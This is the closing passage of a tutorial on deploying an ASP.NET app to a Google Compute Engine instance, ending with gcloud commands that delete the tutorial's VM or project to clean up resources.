After publishing completes, Visual Studio opens the app in your default web browser. Congratulations! You now have a working ASP.NET app running on a Compute Engine instance.

Cleaning up

If you're done with the tutorial and want to clean up resources that you've allocated, see Cleaning Up.
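Cleanup can also be performed from the command line. A sketch, with the caveat that the instance name, zone, and project ID below are placeholders that must match whatever you actually created, and that deleting a project removes every resource in it:

```shell
# Delete the VM instance created for this tutorial.
gcloud compute instances delete my-aspnet-vm --zone=us-central1-a

# Or, to release all allocated resources at once, shut down the whole project.
gcloud projects delete PROJECT_ID
```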